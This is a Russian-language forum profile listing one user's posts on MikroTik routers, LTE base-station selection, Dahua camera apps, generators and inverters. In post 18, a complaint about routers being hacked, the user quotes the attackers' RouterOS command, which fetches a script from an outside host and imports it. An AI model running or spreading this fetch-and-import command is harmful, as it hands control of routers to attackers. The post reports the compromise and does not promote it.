Перейти к содержимому
Калькуляторы

alex8031

Активный участник
  • Публикации

    122
  • Зарегистрирован

  • Посещение

Все публикации пользователя alex8031


  1. Доброго времени суток и про камеры Dahua хорошие камеры умеют писать на sd карту что в камере не нужно регистратора можно удаленно просматривать через gDMSS plus например но столкнулся с тем что когда смотриш архив через gdmss то видно только последний час записи посмотреть более раннюю запись не дает хотя на флещке все есть и через виндовую smartPSS на компе все нормально может есть какие то альтернативы gdmss для андроид
  2. Всем доброго дня если кто может подсказать. Есть объект с энергопотреблением примерно 2 киловата 1фаза его нужно запитать электричества там нет. Но есть природный бытовой метан вопрос в выборе газового генератора который будет работать круглосуточно и круглогодично что взять недорогое. чтобы не навернулся через 2-3 месяца.
  3. Ну здесь антенна хоть и прикручена 24db решетка к микротику но диаграмма не настолько узкая. и при разнице сигналов в 5- 10% он всё равно цепляется. Насчет SNR проблем нет. Лепить тарелку 3 метра в диаметре не реально.
  4. Да пока не чего конкретного там они что то мутят что бы сотовый оператор как то у себя это дело реализовывал но пока не чего интересного. Более перспективнее в сторону в сторону микротика будет копать там и функционал софтины лучше и прошивки чаще обновляются.
  5. Если можно подробнее.... видел подобную тему на 4pda нотам с хуавеями E3372 в итоге все расписались в бессилии. На микротиках если скриптами пытаться по IP базовой пытаться перегружать GSM модуль то он хоть 100 раз перегрузится но всё равно падает на одну и ту же базовую станцию. Как бы по МАС базовой прикрутить черный список чтобы он не пытался туда лезть??
  6. Всем доброго времени суток имеется вот такой зверь MikroTik SXT LTE kit ловится несколько базовых станций билайна но те которые ближе и сигнал мощнее находятся в густо населенном квартале и постоянно загружены и скорость 1-2 мбита а та которая дальше не загружена и speedtest 30-40 Вопрос как сделать чтобы постоянно коннектился только к определённым базовым станциям а остальные просто игнорировал.
  7. Всем доброго времени суток обращаюсь к специалистам за советом На объекте при строительстве для видеонаблюдения строители заложили кооксиал (закатали в бетон) кабель не поврежден. Но хозяин решил вместо аналоговых поставить IP камеры заменить кооксиал на витуху нет возможности wifi не пробивает может кто посоветует какой нибудь преобразователь как передать LAN по кооксиалу. зарание спасибо.
  8. Mikrotik LTE kit отваливается 4G

    Попробуте симку другого оператора воткнуть ну что нибудь билайн мтс или мегафон и посмотри что будет и тогда видно будет куда копать.
  9. SIP+4G

    посмотрю в этом направлении но мне выгодней 4G по договору с провайдером самый дешевый в 4g и прием шикарный а на микротике программно поднять sip ip все равно на выходе будет snr-vp-7030
  10. Добрый день может кто подскажет какое взять оборудование имеется симкарта билайн с безлимитным интернетом 4g и с большим количеством минут. Поставлена задача раздать интернет на компьютеры и одновременно телефонию по sip с этой же симы. Кто намекнет что реально можно использовать микротьк951 + свисток huawei3372 или на каком оборудовании можно это реализовать
  11. NAG - официальный дистрибьютор Dahua

    Присоединяюсь на сегодняшний день нет софта для win phone10 ранее пользовались DMSS а сейчас он только на андроиде работает А что на windowsphone смотреть камеры dahua не чем?? Что думает на это производитель обращение в его техподдержку и результат нулевой. Видимо всё равно на покупателей??? Может кто в курсе как на win Phone смотреть эти камеры dahua отзовитесь......
  12. А что логи дадут?? адреса забугорные и наверняка хозяева этих адресов такие же жертвы взлома через их модемы через VPN колбасят ваш. Недавно обновил до 6.44beta9 так после очередной попытки взлома хаотично перелопатили настройки. Все пароли при прошивке были сменены всё лишнее почищено доступ закрыт по всем протоколам кроме winbox причём взлом массовый более 10 штук в один день. Будем ждать следующей более удачной попытки как видите новые прошивки живут не очень долго.
  13. Ну только откатываться на 5,26 или старше у меня на этой ни один не сломали а новые кошмарят по чёрному такое впечатление что производитель этих железок нанял программистов и не заплатил людям за работу а те выложили на суд общественности дыры в прошивках?? Или есть другое мнение???
  14. Да если бы они просто перебирали им бы лет на 500 точно хватило, столько не только люди но и микротики не живут. скорее то что написал постом выше straus!!!
  15. Ну так понятно что микротик стоит на бело адресе но только одного не понятно как после апрельского затыкания дыр на новой прошивке в июле опять ломанули??? И второе ограничивать админку микротика одним адресом не всегда удобно Вероятно дырявая сама реализация протокола winbox в микротиках. Или же менять порт 8291 на какой нибудь другой может поможет.
  16. Конечно по мак адресу через телнет можно внутри провайдера и то далеко не всегда а если всё выключено кроме winbox и всё равно ломают видимо разработчик прошивок специально для каких то целей оставляет лазейку, и когда это становится известно посторонним начинаются массовые взломы. Видимо когда создавались старые прошивки не ставилась такая цель!!! А по функционалу пусть немного беднее зато надёжно...
  17. ну насчет 6.42.7 если сейчас нет то что будет через месяц два ??? как с предыдущими. а 5.26 почти сотня и ни один не взломан!!! а новые пару десятков и периодически появляется всякая ерунда если вовремя не убереш приходится ехать к клиенту и ресетить потому что закрвается весь доступ к устройству по всем протаколам.
  18. Так похоже что новые прошивки дырявые на старых 5.26 и старше не единого взлома, а на новых одни проблемы и ни смена пароля настройки файервола ни закрытие 80 порта не даёт результата недавно пошла ещё одна гадость /tool fetch url=http://ciskotik.com/3.php mode=http dst-path=mikrotik.php /import mikrotik.php и новые микротики не всегда удается откатить на версию 5.26
  19. Доброго всем времени суток может кто встречался вопрос следующий имеется 2 микротика установленные в разных местах на одном поднят сервер РРТР а на другом клиент оба на разных провайдерах и всё бы ни чего но один из провайдеров (что ближе к клиенту) зачем то решил блокировать порт 1723 Вопрос как на микротике в РРТР сервере изменить этот порт на какой нибудь другой??
  20. Не знаю что у тебя за провайдер ТВ но попробуй вот это может заработает http://www.technotrade.com.ua/Articles/iptv_config_mikrotik.php
  21. Ууу...мудрёно. Влезать в схему холодильника для экономии 5-10 Вт на работе преобразователя? Оно Вам надо? АКБ 200А*ч продержит холодильник около 8 часов. С мудрёной схемой будет 8,5 часов. Есть смысл мудрить? С инверторными холодильниками пока лично не сталкивался. От друзей-ремонтников слышал, что так маркетологи называют устройство плавного пуска двигателя компрессора, поэтому инвертор тут и при чём. Если это действительно УПП, то пусковые токи будут не 3-7 от номинала, а 1,2-2. Ну здесь конечно экономия не 10ват а гораздо более если учесть что преобразователь не 300ват а с учетом пусковых токов это около 2000ват и мощность потребляемая в режиме холостого хода это около 10 процентов от габаритных 2квт а ещё помножить на то время когда компрессор не работает а это в сумме около 12 часов в сутках то и набегает интересная цифра. Да и устройство плавного пуска компрессора не помешало бы для экономии на преобразователе и на КПД всей системы.
  22. что для Вас "Управляемый" и зачем это? по теме: нормальный "ИБП с внешним аккумулятором" (который почему-то все называют инвертором) на пару кВА сможет адекватно запускать холодильник. АКБ подбирать по необходимому времени поддержки. Сколько раз объяснять людям: инвертор - это то, что из постоянки делает переменку. ИБП включает в себя выпрямитель (для зарядки АКБ или воообще всей энергии в "On-Line") и инвертор. А здесь главное что бы когда компрессор не работает то и инвертор не работал иначе зачем он будет в холостую разрежать батарею здесь просто всю электоронику в холодильнике запитать от отдельного низковольтного источника постоянного тока. И ещё корейцы стали много выпускать инверторных холодильников каковы у них пусковые токи и эффективность их применения при данной схеме включения.
  23. А кто мешает на удаленном конце держать любой GSM свисток чтобы через него зайти на оборудование и сделать всё что надо????????? в случае глобального порыва оптики.
  24. 0,6 избыточно, 0,3 самый раз, на км из нового все примерно +/- 300к Да за такие деньги можно узбеков нанять они зубами этот километр прокапают и положат кабель................... а вот из б/у можно что то легко подобрать за половину или чуток больше.
  25. Бесплатного или «бесплатного»? Если есть мысль быть самым хитрым и как-то на WiFi зарабатывать, то эту мысль нужно забыть и действовать как положено — лицензия, провайдер и прочее. Если WiFi действительно бесплатный и публичный, то тогда это не услуга и лицензия не требуется. Однако идентификация пользователей и выполнение отраслевых требований (блокировка запрещенных сайтов, СОРМ) по прежнему требуется. Поэтому возникают большие сомнения в бесплатности WiFi. Скажем так, раздать можно но будут затраты 1. трафик 2. авторизация 3. (1) оборудование wi-fi 4. поддержание оборудования в рабочем состоянии ... Вопрос, за чей счет банкет? Ну если сильно нужно просто выключить защиту на домашней точке доступа и пусть соседи радуются халяве........... Если даже какой то тошный сосед куда то и напишет ну максимум прикинуться вальтом.. ну будет предупреждение и всё..а одним больше или меньше кто их считает?????